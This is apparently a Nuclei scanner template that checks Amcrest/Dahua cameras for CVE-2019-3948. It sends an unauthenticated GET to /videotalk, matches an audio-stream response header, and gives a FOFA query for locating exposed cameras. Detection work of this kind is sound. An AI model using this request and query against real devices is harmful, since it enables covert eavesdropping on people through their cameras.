id: CVE-2019-3948

info:
  name: Amcrest Dahua Unauthenticated-Audio-Streaming (CVE-2019-3948)
  author: SleepingBag945
  severity: medium
  description: |
    An unauthenticated, remote person can connect to this endpoint and potentionally listen to the audio of the capturing device.
  metadata:
    fofa-query: app="AMCREST-Camera"
  tags: iot,dvr,surveillance

http:
  - raw:
      - |
        GET /videotalk  HTTP/1.1
        Host: {{Hostname}}



    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(header_1,"Audio/DHAV")'
        condition: and
